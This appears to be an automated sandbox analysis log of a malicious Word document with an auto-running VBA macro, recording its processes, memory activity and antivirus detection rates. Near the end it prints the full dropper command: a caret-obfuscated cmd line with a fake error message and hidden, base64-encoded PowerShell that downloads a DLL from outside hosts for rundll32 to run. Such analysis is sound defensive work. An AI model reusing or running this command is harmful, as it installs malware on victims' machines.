                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Agilzgamuljjdwml\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B0D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000DBB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10014602
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002814
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001821E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018A24
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DA27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A82A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000B22A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000422B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001A02C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001A82C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000E42E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000BA46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F249
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018C4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001505A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001662
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001664
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D87D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10010082
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001E689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018489
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002C93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10011494
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000AE9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100026A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008EA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100112B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001E0B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000BEBD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100048C7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004AD3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100068D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100084D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100042DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001E4E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10010CE0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100038E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10012CE3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001A2E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000E8F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001EF9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10006AFC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007306
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CF07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003F0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10013F16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018721
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10019726
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C92D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001732F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D535
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10016334
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10014D39
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003743
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F54C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001894D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10010950
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10011F54
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CB58
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001BF69
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007B6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A16A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10019D6D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001197B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DD80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10017B8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B598
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001539F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000799F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001E9A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000EBA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100021C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C1C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100107D3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100095DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D5DF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100129E3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F7EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100033F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A7FA
                      Source: PO# 01222021.docOLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentationOLE, VBA macro: Module Sky5mdbfre3xe7q8, Function Document_open
                      Source: PO# 01222021.docOLE indicator, VBA macros: true
                      Source: rundll32.exe, 00000006.00000002.2102951545.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102183359.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115579456.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.evad.winDOC@28/8@1/3
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$# 01222021.docJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC2C2.tmpJump to behavior
                      Source: PO# 01222021.docOLE indicator, Word Document stream: true
                      Source: PO# 01222021.docOLE document summary: title field not present or empty
                      Source: PO# 01222021.docOLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exeConsole Write: ............`........................... .a.......a...............".....X.".............#...............................h.......5kU.......".....
                      Source: C:\Windows\System32\msg.exeConsole Write: ............`...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.........".....L.................".....
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0.N..............................IP..... .........#.............}..v....x....... ...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................D.j..... #...............#.............}..v............0.N...............[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................G.j......................#.............}..v............0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................G.j......[...............#.............}..v....h.......0.N.............(.[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............EG.j.....i................#.............}..v.....N......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............EG.j..... #...............#.............}..v.....N......0.N.............x.[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j.....M[...............#.............}..v............0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j....@.................#.............}..v............0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j.....M[...............#.............}..v............0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j....@.................#.............}..v............0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j.....M[...............#.............}..v............0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j....@.................#.............}..v............0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0.N.............HJ[.....(.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j......................#.............}..v............0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.6.7.............}..v.... .......0.N.............HJ[.....$.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j......................#.............}..v....X.......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j......................#.............}..v.... ......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j..... ................#.............}..v....X!......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....M[...............#.............}..v.... (......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....(................#.............}..v....X)......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....M[...............#.............}..v.... 0......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....0................#.............}..v....X1......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....M[...............#.............}..v.... 8......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....8................#.............}..v....X9......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v.... @......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....@................#.............}..v....XA......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....M[...............#.............}..v.... H......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....H................#.............}..v....XI......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....M[...............#.............}..v.... P......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....P................#.............}..v....XQ......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....M[...............#.............}..v.... X......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....X................#.............}..v....XY......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v.... `......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....`................#.............}..v....Xa......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....M[...............#.............}..v.... h......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....h................#.............}..v....Xi......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....M[...............#.............}..v.... p......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....p................#.............}..v....Xq......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....M[...............#.............}..v.... x......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....x................#.............}..v....Xy......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v.... .......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v....X.......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....M[...............#.............}..v.... .......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v....X.......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....M[...............#.............}..v.... .......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v....X.......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j.....M[...............#.............}..v.... .......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j......................#.............}..v....X.......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j......................#.............}..v.... .......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j......................#.............}..v....X.......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j.....M[...............#.............}..v.... .......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j......................#.............}..v....X.......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j.....M[...............#.............}..v.... .......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j......................#.............}..v....X.......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j.....M[...............#.............}..v.... .......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j......................#.............}..v....X.......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j......................#.............}..v.... .......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j......................#.............}..v....X.......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j.....M[...............#.............}..v.... .......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j......................#.............}..v....X.......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j.....M[...............#.............}..v.... .......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j......................#.............}..v....X.......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....M[...............#.............}..v.... .......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v....X.......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v.... .......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v....X.......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....M[...............#.............}..v.... .......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v....X.......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....M[...............#.............}..v.... .......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v....X.......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....M[...............#.............}..v............0.N.....................j.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....P.................#.............}..v............0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....M[...............#.............}..v....x.......0.N.............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................B.............................. .L...............#..............................................J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....M[...............#.............}..v............0.N.....................r.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v....8.......0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j.....M[...............#.............}..v............0.N.............HJ[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N..............J[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................5z.j....E.h...............#.............}..v....xH......0.N...............[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................5z.j....E.h...............#.............}..v............0.N...............[.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
                      Source: PO# 01222021.docVirustotal: Detection: 66%
                      Source: PO# 01222021.docMetadefender: Detection: 48%
                      Source: PO# 01222021.docReversingLabs: Detection: 67%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcA
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
